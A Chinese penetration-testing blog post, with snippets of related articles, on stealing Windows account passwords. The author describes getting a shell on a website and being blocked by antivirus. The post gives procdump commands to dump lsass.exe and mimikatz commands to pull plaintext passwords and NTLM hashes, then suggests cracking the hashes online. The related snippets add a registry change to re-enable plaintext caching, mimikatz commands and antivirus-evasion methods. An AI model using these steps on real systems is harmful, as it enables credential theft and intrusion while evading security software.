利用Procdump+Mimikatz获取Windows帐户密码

最新推荐文章于 2024-07-04 11:22:20 发布
最新推荐文章于 2024-07-04 11:22:20 发布
阅读量3.1k 收藏 11
点赞数 4
分类专栏: 渗透测试 文章标签: 内网渗透

在这里插入图片描述
0x01 前言:
前段时间拿下一个网站的shell,很幸运的是直接就是System权限,结果发现执行添加用户命令并不能成功回显

看了下系统进程,原来是开启了360的主动防御,奈何也不会做免杀,上传exp运行就被杀,尝试各种方法去kill主动防御进程,无果。。。

在土司发帖求助了一下经验丰富的大佬们,然后就有了如下文章:

实验环境:win7企业版64位

0x02 导出lsass.exe
首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

在这里插入图片描述

这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

0x03 执行mimikatz
这里不建议直接上传到服务器上执行,一是有一定概率出现玄学bug导致服务器崩溃,二是可能会被杀软拦截

在这里插入图片描述

将lsass.dmp下载到本地后,然后执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

0x04 列出账号密码
可以看到有明文的密码,还有NTLM的hash

在这里插入图片描述

hash可以拿去网站解密下,一般情况下六位以下密码还是很容易破解出来的

在这里插入图片描述

sdly_熬夜冠军
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
密码抓取--Prodump+Mimikatz抓取windows系统密码
网络安全。
02-13 1369
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。 procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
procdump+mimikatz.zip
11-14
procdump+mimikatz
Mimikatz的18种免杀姿势及防御策略
最新发布
2301_76786857的博客
07-04 117
本文主要介绍了如下5类免杀方式,共18种免杀方法。本文虽然是针对Mimiktaz进行免杀,但更多的是想研究学习一下比较通用的exe的免杀方式,比如文中介绍的exe通用加载器、powershell执行exe、白名单加载exe等有几种方法可以适用于任意的exe免杀,如果只是针对mimikatz进行免杀完全没必要这么啰嗦的。1、源码免杀。在有源码的情况下,可以定位特征码、加花指令、多层跳转、加无效指令、替换api、重写api、API伪调用等等,这部分内容较多略复杂,打算另写一篇进行介绍,本文不多介绍。
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 3372
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
procdumpmimikatz联动
weixin_45715461的博客
06-30 704
procdumpmimikatz联动
ProcDump+Mimikatz绕过杀毒软件抓密码
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-02 913
如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?答案是肯定的,那就是ProcDump+Mimikatz绕过杀毒软件抓密码。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用。导出lsass.dmp文件后,使用猕猴桃读取密码hash。读取对方内网机器密码
procdump32_64+mimikatz.rar
06-15
标题中的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具与mimikatz工具的压缩包。这两个工具在IT安全领域中有着重要的作用,特别是对于系统调试和安全审计。 **procdump** Procdump是...
procdump配合密码获取
04-03
描述中提到的"配合密码获取"可能是指在特定情况下,利用Procdump获取进程中包含密码的信息。这可能涉及到了安全漏洞,比如如果一个进程无意中在内存中存储了明文密码Procdump可以被用来创建该进程的内存转储,然后...
Procdump密码读取.zip
04-16
标题“Procdump密码读取.zip”提示我们这个压缩包涉及的是一个名为...对于那些不熟悉这个工具的人来说,提供的文本文件将是一个宝贵的资源,可以帮助他们了解如何利用Procdump来安全有效地读取和分析内存中的密码信息。
Windows下用于生成Dump文件的工具
04-04
总的来说,Procdump是一个强大的工具,它为Windows平台上的C++软件调试提供了一个有效的解决方案,通过捕获和分析Dump文件,可以帮助开发者快速定位并解决复杂的问题。正确理解和使用Procdump,将极大地提升软件开发...
Procdump&mimikatz&NatBypass
AaronLuo
06-30 484
Procdump抓取密码 Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因 首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略 使用管理员权限,利用procdump64.exe(或procdump32.exe)导出lsass.dmp procdump64.exe -accepteula -ma lsass.exe lsass.dmp
Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2462
Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 330
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3906
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
Mimikatz + procdump 的使用
键盘上温暖而又美好的时光
11-15 6229
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
内网渗透-Mimikatz+Procdump的使用
weixin_60830484的博客
04-24 537
内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1109
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值